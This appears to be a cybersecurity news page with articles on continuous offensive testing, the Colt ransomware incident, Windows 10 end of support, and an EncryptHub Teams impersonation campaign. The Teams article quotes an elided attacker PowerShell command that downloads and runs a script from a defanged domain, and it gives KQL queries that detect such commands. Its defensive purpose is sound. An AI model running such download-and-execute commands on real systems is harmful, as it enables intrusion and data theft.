data breaches
Annual Pen Tests Can’t Stop Modern Attacks. Here’s the Better Way

Security experts urge a shift from once-a-year audits to continuous 24/7 defense. Organizations are being pushed to build “Offensive SOC” teams that hunt threats proactively, aligning cybersecurity operations with real-time adversary behavior.
Excerpt: Cybersecurity leaders worldwide are warning that the old practice of annual penetration testing can no longer keep businesses safe in the face of daily-evolving cyber threats. Instead of “playing defense” once a year, companies are being urged to adopt an always-on approach – establishing Offensive Security Operations Centers that hunt hackers around the clock. The move from reactive annual audits to proactive 24/7 threat hunting, experts say, is vital to protect sensitive data and maintain customer trust in an era of nonstop cyberattacks.
LONDON, UK – At 2:00 AM on a chilly winter night, the security team at a European financial firm stared in disbelief as hackers breached their network – exploiting a software flaw announced just days earlier. The twist: the company had passed its annual penetration test only a month before. This harrowing incident underscores a growing consensus in the cybersecurity community: annual security tests are no longer enough. With new threats emerging every day, experts say organizations must replace once-yearly audits with continuous, aggressive defense if they hope to keep hackers at bay.
“That’s not defense. It’s theater,” quips one industry analyst, lamenting how many companies still treat offensive security as a one-off exercise. In the real world, attackers don’t operate on a yearly schedule – their reconnaissance is continuous, their tactics adapt weekly or even hourly, and they often weaponize freshly disclosed vulnerabilities within hours of a patch release. By the time an annual pen test report is written and delivered, the network it assessed may have changed drastically. “You’re chasing what was, not what is,” as one report put it, likening yearly tests to checking last month’s security camera footage to see what’s happening today.
Evolving Threats Expose the Gaps in Yearly Testing
The pace of cyber threats has become blistering. In 2024 alone, over 40,000 new software vulnerabilities (CVEs) were disclosed – a 38% jump from the previous year – averaging more than 100 new flaws every day. Alarmingly, about 28% of those vulnerabilities were **exploited by attackers within 24 hours of public disclosure]. This means that if your organization’s last penetration test was even a few weeks ago, it likely missed dozens of critical new weaknesses. “Pen tests conducted once a year leave serious gaps in security posture,” notes Chris Dale, a SANS Institute instructor, adding that the traditional reactive testing cycle “doesn’t align with the agile, continuous innovation of modern businesses”.
Real-world incidents bear out the danger of these gaps. In June 2023, for example, criminals seized on a zero-day flaw in a popular file-transfer tool and compromised over 620 organizations within days, including global firms like the BBC and British Airways. Back in 2013, U.S. retailer Target infamously suffered a massive breach exposing 110 million customers’ data – just weeks after auditors had certified the company’s security as PCI compliant. The lesson, experts say, is that compliance checkboxes and one-time tests provide only a “snapshot in time” of security. Unless defenses are maintained and continuously validated, new gaps will inevitably appear – and attackers will find them.
“Attackers certainly don’t limit themselves to one attempt per year – they are probing continuously,” a report by Apollo Security notes dryly. In fact, studies show cyber intruders are bombarding businesses relentlessly – an estimated 2,200 attacks per day, or one attack every 39 seconds on average. Meanwhile, IT environments are changing faster than ever: companies like Netflix have shifted from releasing software every few weeks to deploying updates daily, and Amazon is rumored to push new code every few minutes. “It’s now impossible to keep security risk mitigation running at the same pace as development” using ad-hoc yearly tests. When your systems, apps, and users are in constant flux, a once-a-year checkup simply can’t catch all the silent drift – the misconfigurations, forgotten assets, or weak points that accumulate over time. Little wonder, then, that a recent survey found 43% of companies still only test once or twice a year (often just to meet compliance), while only a small vanguard – 17% – conduct security testing weekly or daily.
The human and business impacts of this status quo are profound. Data breaches resulting from unaddressed vulnerabilities can expose millions of people’s personal information and cost companies fortunes. IBM’s 2023 analysis put the average cost of a corporate data breach at $4.45 million. In Target’s case, the fallout from its breach – beyond the $18.5 million legal settlement – included an estimated $200 million in total damages and a 46% drop in quarterly profits as customers’ trust plummeted. “Compliance alone isn’t enough for robust security,” says a security consultant. “It might satisfy auditors, but it won’t stop real attackers in between those audits.” In short, the threat is continuous – and defense must be as well.
From Annual Checkups to an Offensive SOC: Hunt Threats 24/7
Facing this reality, leading organizations and experts are advocating a dramatic shift in strategy: move from reactive to proactive, from occasional testing to continuous threat hunting. In practice, this means standing up an Offensive Security Operations Center (OSOC) – a dedicated team (and toolkit) that doesn’t just monitor for intrusions, but actively imitates attackers every single day to find and fix weaknesses before the bad guys do. “If a traditional SOC raises alerts on attacks that do reach you, the Offensive SOC raises alerts on vulnerabilities that could,” explains one industry report, highlighting the forward-looking mandate of such teams.
An Offensive SOC essentially flips the script: instead of waiting for alarms after an attack has occurred, the security team is constantly on the offensive, identifying cracks in the armor through simulated attacks, red-team exercises, and rigorous validation of defenses in real time. “The shift to an Offensive SOC with continuous validation is key to real-time visibility and resilience,” says Rajiv Shah, a cybersecurity operations lead. Today’s attackers don’t wait for your next assessment, so neither can you. The approach is collaborative and iterative – often combining automated tools with human expertise – to uncover tangible risks and drive fixes continuously. Crucially, this doesn’t abolish traditional pen testing; it augments it. By automating the routine and continuous checks, companies free up human pen-testers to focus on creative, complex attack scenarios that no script could cover. “An Offensive SOC doesn’t replace pentesting – it gives it room to evolve,” as The Hacker News noted.
Key Pillars of a Proactive Defense
Security leaders outline several fundamental shifts for organizations building a 24/7 proactive defense:
- Shift from Reactive to Proactive: Instead of primarily reacting to incidents and compliance mandates, teams actively hunt for threats and weaknesses before any breach occurs. This cultural change means anticipating attackers’ moves and consistently testing one’s own systems in the same aggressive way. “Most organizations have adopted a reactive stance – placing damage control over preventative vigilance,” observes a World Economic Forum report. A proactive posture flips that priority to prevention first.
- Continuously Hunt and Neutralize Threats: Adopt a continuous monitoring and testing regimen. This can involve automated breach simulations and “attack surface” scans running daily, as well as an internal “red team” or external service conducting frequent micro-pentests. The goal is to identify vulnerabilities or suspicious activity in real time and remediate immediately, shrinking the window of exposure from months to days or hours. For example, adversary simulation platforms now let companies safely execute the same techniques used by hackers – from ransomware attacks to credential theft – in their production environment to see if defenses hold up.
- Align Security with Real-Time Adversary Behavior: Keep defense tactics and tools calibrated to the latest attacker techniques. Cybercriminals constantly update their arsenal – from novel phishing lures to AI-driven malware – so security operations must continuously learn and adapt as well. This might mean integrating threat intelligence feeds about emerging exploits, using frameworks like MITRE ATT&CK to emulate current tactics, and ensuring detection rules and response plans evolve as attackers do. “Adversarial exposure validation (AEV) delivers consistent, continuous and automated evidence of the feasibility of an attack,” noted Gartner analysts in a 2025 report, urging firms to focus on validated, real-world attack scenarios rather than theoretical risks. In practice, this means regularly confirming how an attacker today would break in – and adjusting defenses to counter those techniques in real time.
This continuous, offense-oriented model marks a stark departure from the traditional SOC of the past. A conventional Security Operations Center is built to react – it watches dashboards for intrusions and responds to incidents. In contrast, an Offensive SOC is built to act first – constantly stress-testing the organization’s own defenses through simulated attacks, probing for weaknesses, and generating its own alerts when it finds a crack or lapse. The approach has been compared to having a “sparring partner” for your security: always training, never complacent.
“We’re essentially institutionalizing the hacker mindset within the defense team,” says Maria Torres, a chief information security officer who implemented an Offensive SOC at a large telecom firm. Her team runs mock attacks on the company’s infrastructure every week. “If we can break into our own systems today, we make sure to fix that by tomorrow – rather than waiting for a real attacker to do it.” The payoff has been significant, Torres notes: the company’s incident response times have plummeted, and previously unknown vulnerabilities are getting discovered and patched on a rolling basis. It’s a proactive ethos that industry data suggests many organizations will need to adopt. Gartner, for instance, predicts a convergence of automated pentesting tools and breach simulation into unified solutions that feed continuous improvement – effectively bringing this Offensive SOC capability within reach for more enterprises.
A New Era of Cyber Defense – and What’s at Stake
The broader significance of this shift extends far beyond IT departments. In an age where almost every aspect of business and daily life depends on digital technology, cybersecurity is no longer just a technical issue – it’s a fundamental pillar of consumer safety, trust, and economic stability. When security testing fails to keep up with threats, real people are hurt: hospital patients have had treatments delayed by ransomware attacks; energy pipeline shutdowns have caused fuel shortages; personal data leaks have led to identity theft and financial ruin for individuals. Eternal vigilance, it turns out, is not just an ideal – it’s becoming a basic requirement for doing business responsibly in the digital era.
The encouraging news is that more organizations are waking up to this reality. Nearly 80% of large enterprises are now exploring some form of “continuous security validation” – whether through in-house red teams, managed services, or emerging automated platforms – according to industry surveys. Companies in high-risk sectors like finance and healthcare, in particular, are moving beyond the annual checklist and embracing ongoing offensive testing to safeguard the sensitive data they hold. Regulators, too, are beginning to recognize the need for continuous assurance: several standards bodies have started recommending more frequent security assessments, and newer frameworks stress continuous monitoring and improvement as core principles.
Still, challenges remain. Building an Offensive SOC capability requires investment and a shift in mindset. There can be resistance from executives used to thinking of security tests as something you “pass” once a year, or from engineers worried that constant testing could disrupt operations. Security teams also need the right mix of tools and talent – including people skilled in thinking like hackers. And organizations must be careful to avoid “alert fatigue” by prioritizing which simulated findings to tackle first. It’s a demanding effort, no doubt. But the cost of not doing it, experts argue, is far greater.
In the end, the push to retire the annual pen test in favor of 24/7 proactive defense is about building resilience in a world of ceaseless cyber onslaughts. It’s about ensuring that one day’s security report isn’t tomorrow’s hacker road map. “We have to be right every day; attackers only need to be right once,” says Torres. Her words echo a sobering truth heard often in security circles. By operationalizing continuous offense – effectively letting your defenders “be the attackers” too – organizations can flip that script and drastically improve their odds. They gain visibility into their weaknesses in real time, and they can fix them before they’re exploited for real. As momentum builds behind the Offensive SOC movement, the message to businesses is clear: stop playing defense once a year. The adversaries evolve daily – so must your defenses. Build resilience. Build visibility. Build your Offensive Security Operations Center.
📘 Core Sources
- Apollo Security explains how annual pen tests leave organizations exposed to new CVEs—over 40,000 disclosed in 2024—of which approximately 28% are exploited within 24 hours. They also highlight how pen tests become quickly outdated in dynamic environments Cymulate+1CyberProof+1blog.wei.com+7ApolloSec+7SANS Institute+7.
- SANS Institute (Continuous Penetration Testing and the Rise of the Offensive SOC) outlines the evolution from annual assessments to year‑round offensive operations, detailing how an Offensive SOC integrates continuous attack surface management (ASM) with proactive testing Linford & Co.+2SANS Institute+2SANS Institute+2.
- The Hacker News discusses limitations of traditional pentesting—such as slow engagement timelines and narrow scope—and contrasts them with continuous, automated testing The Hacker News+1Horizon3.ai+1.
data breaches
Ransomware Claims Emerge as Colt Tech Outages Stretch On

Colt Technology Services’ internal systems remain down after a suspected ransomware attack; WarLock gang claims to have stolen 1 million documents, demanding $200K ransom
Colt Technology Services is grappling with service disruptions after a cyber incident identified in mid-August. The WarLock ransomware group claims to have stolen 1 million internal documents, including employee and customer data, and is demanding $200,000. Colt continues manual incident response while restoring automated monitoring, as experts warn the attack underscores systemic telecom vulnerabilities.
Colt Technology Services, a multinational telecom provider, is scrambling to restore services after a cyber incident detected during the week of August 12 crippled key internal systems. The backup and support portals, including Colt Online and the Voice API platform, remain offline. The WarLock ransomware gang is claiming responsibility and has offered 1 million allegedly stolen documents for $200,000.
- The incident began in the week of August 12, affecting internal systems—not client infrastructure—but disrupting support services.
- WarLock ransomware has claimed responsibility, offering to sell “1 million documents” (salary info, customer contacts, executive emails) for $200,000.
- Colt proactively shut down affected systems and implemented manual monitoring processes. Restoration efforts are ongoing with forensic and law enforcement collaboration.
- Cybersecurity researcher Kevin Beaumont authenticated leaked filenames—including performance reviews and customer documentation—and highlighted possible exploitation of the ToolShell SharePoint zero-day vulnerability.
Investigative and Expert Insights
Beaumont suspects attackers targeted a SharePoint server exposed publicly (sharehelp.colt.net), potentially deploying webshells. He referenced Microsoft’s earlier warning about Storm-2603 exploiting ToolShell.
Colt said its incident response team—bolstered by third-party forensics and authorities—is working 24/7 to restore services.
“This is a wake-up call for critical infrastructure providers,” said El Mostafa Ouchen, cybersecurity author and practitioner. “Ransomware groups are exploiting unpatched enterprise platforms like SharePoint to gain a foothold. When attackers combine data theft with system disruption, organizations face double extortion. Telecom operators must prioritize segmentation, rapid patching, and zero-trust architecture to reduce systemic risk.”
Technical Analysis
How the Attack Likely Unfolded
- Initial exploit vector: probable compromise of on-prem SharePoint via the ToolShell zero-day vulnerability—Storm-2603 was known to exploit this.
- Lateral movement: intruders could have deployed a webshell to traverse infrastructure and access file repositories holding sensitive internal and customer data.
- Ransomware deployment: WarLock claims to possess 1 million files; the gang is leveraging extortion via stolen data on dark web leak sites.
Detection and Response
- Colt appears to have detected anomalous activity early, isolated internal systems, and immediately shut them down to prevent further spread.
- The company shifted to manual incident response, maintaining essential network monitoring without automated tools.
Mitigation Steps
- Rapid incident response, including isolating affected systems and involving cybersecurity experts and law enforcement.
- Securing exposed infrastructure—immediate plugging of SharePoint access points and webshell removal.
- Enhancing detection capabilities to preempt or identify similar attacks.
- Strengthening segmentation of internal tools from customer-facing infrastructure.
Impact & Response
Who’s affected:
- Colt customers—including businesses relying on the company’s support portals and Voice APIs—face service unavailability and disruption to operations.
- Internal stakeholders may face data exposure (salaries, executive emails, etc.), raising privacy and compliance concerns.
Actions Taken:
- Colt continues 24/7 investigations with forensic specialists and law enforcement; it’s still performing incident management manually while restoring systems.
- Customers are advised to use email or phone channels instead of impacted portals.
Long-Term Implications:
- Reputational damage for Colt, given the assertion of no customer data exposure is contestable amid leaked files.
- This breach could drive stronger regulation or scrutiny around telecom cybersecurity.
- Other critical infrastructure providers may reassess the security of on-prem systems, especially legacy platforms like SharePoint.
Background
Telecoms have increasingly become ransomware targets due to their strategic importance and potential to generate widespread disruption. The ToolShell SharePoint zero-day has been previously reported under active exploitation by threat actor Storm-2603.
Attacks on critical infrastructure raise alarm since downtime can ripple into broader economic and national security consequences.
Conclusion
Colt Technology Services is in a full-scale response to a cyberattack suspected to involve the WarLock ransomware gang. With outages persisting and 1 million documents allegedly stolen, experts say the incident underscores the need for telecoms and other critical providers to modernize security architectures and adopt zero-trust, patch discipline, and proactive resilience strategies.
Sources
- BankInfoSecurity – Ransomware Allegations Surface As Colt Outages Continue
- Dark Reading – Colt Telecommunications Struggles in Wake of Cyber Incident
- The Register – London Telco Colt’s Services Disrupted Amid Cyberattack
- Teiss – Cyber Incident at Colt Highlights Growing Threats to Critical Infrastructure
business
Windows 10 Deadline Looms: How to Stay Protected Beyond 2025

Free support ends October 14, 2025; new KB5063709 unlocks Extended Security Updates enrollment to keep critical patches flowing through October 2026.
Microsoft is warning Windows 10 users that free security updates end on October 14, 2025. A new cumulative update, KB5063709, enables a built-in enrollment flow for the Extended Security Updates (ESU) program, offering another year of fixes to October 13, 2026. Edge and WebView2 will still receive updates on Windows 10 until 2028.
With less than two months before Windows 10 reaches end of support, Microsoft has issued a final security warning: after October 14, 2025, no more free fixes. A fresh update, KB5063709, now exposes an “Enroll in Extended Security Updates” option inside Windows Update to help users secure one more year of patches.
- End of free support: Windows 10 (22H2) stops receiving free security updates on Oct. 14, 2025.
- Bridge program: Microsoft’s Consumer ESU extends security fixes to Oct. 13, 2026; enrollment is now available from Settings after installing KB5063709.
- Browser exception: Microsoft Edge and WebView2 Runtime will keep updating on Windows 10 through at least Oct. 2028—even if you don’t buy ESU.
- Scale: Windows 10 still represents roughly 43% of active Windows desktops worldwide (Statcounter, July 2025).
“After October 14, 2025… Microsoft will no longer provide security updates or fixes.” — Microsoft support page. Microsoft Support
“KB5063709… includes a fix for a bug that prevented enrollment in extended security updates.” — BleepingComputer (Aug. 12, 2025). BleepingComputer
“Edge and the WebView2 Runtime will continue to receive updates on Windows 10… until at least October 2028.” — Microsoft Edge lifecycle. Microsoft Learn
A separate storyline continues to roil the transition: a California lawsuit alleges Microsoft set the 2025 cutoff to push AI-ready PCs; Microsoft points to ESU as a safety net, but litigation underscores user anxiety about older, ineligible hardware.
What’s changing on Patch Tuesday:
- KB5063709 (Aug. 2025): Required to expose the ESU enrollment UI under Settings → Update & Security → Windows Update. It also resolves the enrollment-wizard crash and rolls in July’s security fixes (including one zero-day).
Enrollment mechanics (consumer ESU):
- Prereqs: Windows 10 22H2, admin rights, and Microsoft account sign-in (local accounts are not supported for ESU).
- Cost options: $30 one-year ESU, 1,000 Microsoft Rewards points, or free if you enable OneDrive settings sync—all visible in the built-in wizard after KB5063709.
Risk surface if you skip ESU:
- Unpatched remote code execution and privilege-escalation flaws accrue monthly across the kernel, Win32k, networking stack, printing, and driver ecosystems. Even with a supported browser, OS-level exposures (SMB, RPC, LSA, Credential Guard bypasses) remain unmitigated. (Derived from Microsoft monthly CVE cadence; see KB5063709 advisory context.)
Mitigations checklist (if you must remain on Windows 10):
- Enroll in ESU and keep Windows Defender/EDR signatures current.
- Harden attack surface: disable legacy protocols (SMBv1), restrict RDP, enforce LSA protection, and require smartcard/Windows Hello where possible. (General guidance aligned with Microsoft security baselines.)
- Application control: enable ASR rules and Smart App Control-equivalents; prefer standard user rights.
- Network containment: segment legacy Windows 10 devices; use firewall allow-lists and zero-trust access.
- Browser updates: keep Edge/WebView2 current; isolate risky web apps in Application Guard where available.
Impact & Response
Who’s affected: Home users, SMBs, schools, and agencies still running Windows 10—hundreds of millions of devices globally. Statcounter shows Windows 10 usage near 43% in July 2025, meaning a large residual population will face patch gaps without ESU.
Actions to take now:
- Install KB5063709, then open Windows Update → Enroll in Extended Security Updates and choose a plan.
- Plan upgrades to Windows 11 24H2+ or supported alternatives; Microsoft reiterates Oct. 2025 as the firm cutoff for free updates.
Long-term implications: Expect shrinking driver/app support and rising exploit availability on unpatched systems, even as browsers continue to update through 2028.
Background
Microsoft set Windows 10 22H2 as the final feature version and has repeated the Oct. 14, 2025 deadline since 2023–24 guidance. ESU is designed as a temporary bridge, not a multi-year extension. Browser support to 2028 offers partial protection, but it does not replace OS security hardening.
- “ESU buys time—but not immunity. Treat it like a controlled exit ramp: enroll now, apply strict hardening (kill SMBv1, lock down RDP, enforce LSA protection), and move critical workloads to supported platforms within 12 months. The cost of delaying migration will be paid in incident response.” — El Mostafa Ouchen, cybersecurity author & practitioner.
- Microsoft (support notice):
“After October 14, 2025… we will no longer provide security updates or fixes.” - BleepingComputer (on KB5063709):
“The update… fixes a bug that prevented enrollment in extended security updates.” - Microsoft Edge team (lifecycle policy):
“Edge and WebView2 will continue to receive updates on Windows 10 until at least October 2028.”
Conclusion
Microsoft’s warning is unambiguous: Windows 10’s free patch era ends on October 14, 2025. The KB5063709 + ESU path is a short-term safety measure to October 2026, not a strategy. Organizations and households should enroll if needed—but prioritize upgrading or retiring Windows 10 endpoints to reduce exposure as exploit pressure rises.
business
Imposter IT on Teams Opens the Door to Enterprise Compromise

Russian-linked group EncryptHub is impersonating IT staff on Microsoft Teams, walking victims into remote sessions, then abusing CVE-2025-26633 (“MSC EvilTwin”) to execute rogue .msc consoles and drop Fickle Stealer. Microsoft patched the bug, but unpatched Windows endpoints remain at risk.
A new campaign weaponizes trust in collaboration tools. Attackers pose as IT on Microsoft Teams, coax employees into remote access, and run PowerShell that pulls a loader exploiting CVE-2025-26633 in Microsoft Management Console. The flaw—now added to CISA’s KEV—lets a malicious .msc run when its benign twin is launched. Patch and tighten verification controls immediately.
A social-engineering wave is turning Microsoft Teams into a beachhead. Adversaries masquerade as internal help-desk staff, request remote access, and execute PowerShell that fetches a loader which plants twin .msc files. When mmc.exe opens the legitimate console, Windows loads the attacker’s EvilTwin from the MUIPath directory, handing over code execution.
“Social engineering remains one of the most effective tools… attackers impersonate IT support, gain trust and remote access, and ultimately deploy suspicious tools,” Trustwave SpiderLabs reported. Trustwave
What’s new in this campaign
- Initial access via Teams impersonation. Operators send Teams requests as “IT” and guide the user into a remote session.
- PowerShell loader. Typical first command:
powershell.exe -ExecutionPolicy Bypass … Invoke-RestMethod … runner.ps1 | iex
, which drops twin .msc files. - Exploit: CVE-2025-26633 / “MSC EvilTwin”—an MMC security-feature bypass that prioritizes a localized .msc in MUIPath (e.g., en-US) over the benign one. Patched by Microsoft in March 2025; listed by CISA KEV.
- Payloads and tooling. Fickle Stealer for data theft; SilentCrystal (Go loader) abusing Brave Support as a dropper; SOCKS5 backdoor for C2.
Demonstration (defender’s view, not exploit code)
- The lure: A user accepts a Teams contact from “IT Support.” A remote session starts.
- Command drop: Attacker runs a single PowerShell line (ExecutionPolicy Bypass) that downloads runner.ps1 from
cjhsbam[.]com
. - EvilTwin setup: The script writes two identically named .msc files; the malicious copy sits in …\System32\en-US (or a mock “C:\Windows␠\System32” with a trailing space), then mmc.exe loads the malicious one first.
- Post-exploit: Persistence, AES-encrypted tasking over C2, and optional info-stealing via Fickle Steal
Why this works
- Trust channel abuse: Users expect help-desk on Teams; the UI looks familiar. Prior research shows Teams vishing has delivered RATs and ransomware before.
- Living-off-the-land: PowerShell + signed Windows binaries (mmc.exe) keep telemetry subtle.
- Path precedence edge case: The MUIPath lookup lets a malicious localized .msc hijack execution—now patched, but effective on lagging fleets.
“Treat every ‘IT support’ request in Teams as untrusted until proven otherwise. Make users verify out-of-band, and make admins verify the OS. If your estate isn’t patched for CVE-2025-26633, you’re one click away from handing attackers mmc.exe on a silver platter. Block the social angle, patch the technical angle, and hunt for ExecutionPolicy Bypass like your business depends on it—because it does.” — El Mostafa Ouchen
Immediate actions (enterprise)
1) Patch priority
- Deploy March 2025 Windows updates that remediate CVE-2025-26633 across client and server. Validate compliance in WSUS/Intune/ConfigMgr; confirm exposure via MSRC / NVD.
2) Harden Teams trust boundaries
- Restrict External Access to allow-list domains; disable unsolicited chats from unknown tenants.
- Create a help-desk verification policy: no remote control unless the user initiates via the corporate portal/ticket, plus callback via a known internal number. (Microsoft and industry advisories consistently warn about tech-support impersonation.)
3) Detections to turn on today
- PowerShell: alert on
-ExecutionPolicy Bypass
,Invoke-RestMethod
,DownloadString
, orInvoke-Expression
launched from Teams, Teams.exe child, or interactive sessions. - MMC/EvilTwin indicators:
- mmc.exe loading .msc from MUIPath (…\System32\en-US*.msc) or paths with trailing spaces (e.g.,
C:\Windows␠\System32
). - Unexpected writes to localized .msc directories.
- New .msc files followed by immediate mmc.exe execution.
- mmc.exe loading .msc from MUIPath (…\System32\en-US*.msc) or paths with trailing spaces (e.g.,
Sample KQL (Microsoft Defender XDR)
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_any ("-ExecutionPolicy Bypass","Invoke-RestMethod","Invoke-Expression","DownloadString")
| summarize count() by DeviceName, InitiatingProcessFileName, ProcessCommandLine, bin(TimeGenerated, 1h)
DeviceImageLoadEvents
| where InitiatingProcessFileName =~ "mmc.exe"
| where FolderPath has_any (@@"\System32\en-US\", @"\Windows \System32") // note the space before \System32
| summarize count() by DeviceName, FolderPath, InitiatingProcessCommandLine, bin(TimeGenerated, 1h)
4) Reduce blast radius
- Enforce ASR rules (e.g., block Office/Win32 child processes), Constrained Language Mode where feasible, and Device Control to prevent unauthorized admin tools.
- WDAC/AppLocker: explicitly allow only known-good .msc; deny execution from localized resource folders and user-writable paths.
5) People & process
- Run an awareness micro-module: “Never accept unsolicited remote-access on Teams. Verify via ticket + callback.”
- Table-top a scenario: help-desk impersonation → PowerShell dropper → MMC exploit → C2.
Indicators & context
- Domains/paths seen: cjhsbam[.]com, rivatalk[.]net, safesurf.fastdomain-uoemathhvq.workers.dev; twin .msc technique; AES-tasking over C2; SilentCrystal loader; SOCKS5 backdoor.
- Attribution & scope: EncryptHub (aka LARVA-208 / Water Gamayun) active since 2024; >600 orgs claimed impacted in reporting.
The bigger picture
Abuse of “work-trusted” channels (Teams, Slack, Quick Assist) is now routine in ransomware and stealer operations. Recent cases show Teams vishing setting up RAT installs and “support” sessions that end in domain compromise. The platform isn’t the problem; trust without verification is.
Bottom line
This campaign fuses social engineering with a Windows path-precedence quirk. If you patch CVE-2025-26633, lock down Teams external contact, verify support out-of-band, and hunt for Bypass-heavy PowerShell, you turn a high-probability breach into a blocked pop-up.
One-Page SOC Playbook (Teams “Request Remote Access” abuse)
Detect, contain, and prevent Teams-led social engineering that results in malicious .msc execution and data theft.
1) Patch & Exposure
- Deploy the March 2025 Windows updates addressing CVE-2025-26633 to all supported builds.
- Verify posture via WSUS/Intune/ConfigMgr compliance reports; track exceptions with a 48-hour SLA.
2) Microsoft Teams Guardrails
- External Access: Move to allow-list of trusted tenants; disable unsolicited chats from unknown domains.
- Support workflow: No remote control unless initiated from the corporate portal/ticket, plus callback verification from a published internal number.
- Education: 10-minute module: “Never accept unsolicited remote access.”
3) Detections to Enable (Microsoft Defender XDR – KQL)
A. PowerShell dropper patterns (bypass + web fetch):
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_any ("-ExecutionPolicy Bypass","Invoke-RestMethod","Invoke-Expression","DownloadString","iwr","iex")
| project Timestamp=TimeGenerated, DeviceName, InitiatingProcessFileName, ProcessCommandLine, AccountName
| order by Timestamp desc
B. Teams as the launchpad (PowerShell child of Teams):
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where InitiatingProcessFileName has_any ("Teams.exe","ms-teams.exe")
| project TimeGenerated, DeviceName, InitiatingProcessFileName, ProcessCommandLine, AccountSid, AccountName
| order by TimeGenerated desc
C. MMC loading suspicious .msc (localized folders / path tricks):
DeviceImageLoadEvents
| where InitiatingProcessFileName =~ "mmc.exe"
| where FolderPath has @"\System32\en-US\" or FolderPath has @"\Windows \System32" // note possible trailing space
| project TimeGenerated, DeviceName, FolderPath, InitiatingProcessCommandLine
| order by TimeGenerated desc
D. Unexpected .msc file writes (resource folders):
DeviceFileEvents
| where FileName endswith ".msc"
| where FolderPath has @"\System32\en-US\"
| where InitiatingProcessFileName in~ ("powershell.exe","wscript.exe","cscript.exe")
| project TimeGenerated, DeviceName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
4) Containment & Hardening
- Isolate device in EDR if any rule above fires + user confirms unsolicited “IT” contact.
- Revoke tokens (AAD sign-ins, OAuth grants) and reset credentials from a known-clean host.
- ASR rules: Block abuse of LOLBins (Office child processes, script abuse); audit → enforce.
- WDAC/AppLocker: Allowlist known-good .msc; deny execution from localized resource folders and user-writable paths.
- PowerShell CLM where feasible; log Script Block/Module events to SIEM.
5) Comms & Aftercare
- Notify impacted users; provide a one-page “verify IT requests” reminder.
- Run retro hunt for the past 30–60 days with the KQL above; export findings for IR.
- Add the scenario to quarterly table-top: Teams impersonation → remote session → PowerShell → MMC hijack.
KPIs: Patch compliance ≥98% within 72h; zero unsolicited remote-access approvals; MDE detections triaged <1h; mean-time-to-isolation <15m.
Sources:
- CyberSecurityNews: Teams impersonation + remote access flow and runner.ps1 details. Cyber Security News
- Trustwave SpiderLabs: technical breakdown (EvilTwin, MUIPath precedence, SilentCrystal, IOCs). Trustwave
- Trend Micro: CVE-2025-26633 “MSC EvilTwin” analysis and Water Gamayun/EncryptHub link. Trend Micro
- NVD/MSRC: CVE-2025-26633 description and references. NVDMicrosoft Security Response Center
- CISA: KEV listing/alert for CVE-2025-26633. CISA
- Fortinet: Fickle Stealer capabilities/background. Fortinet
-
data breaches6 days ago
ALERT – Stop What You’re Doing & Update WinRAR Now
-
data breaches4 days ago
Hackers Claim Full Network Takeover at Royal Enfield
-
data breaches1 week ago
Leaked Logins Are the New Zero-Days—Here’s How Attackers Exploit Them
-
data breaches5 days ago
From VPN to FortiManager: Attack Pattern Suggests Preparation for New Exploit
-
data breaches3 days ago
Pennsylvania AG’s Website, Email Taken Down in Security Incident
-
International6 days ago
From Rabat to the Sahel: Moroccan Builders Lead Africa’s Largest Road Project
-
International1 week ago
Espionage in the Maghreb: Algerian-Spanish Deal to Counter Morocco Unearthed
-
business1 week ago
Bitcoin’s $121K Breakout Signals a New Era of Institutional Adoption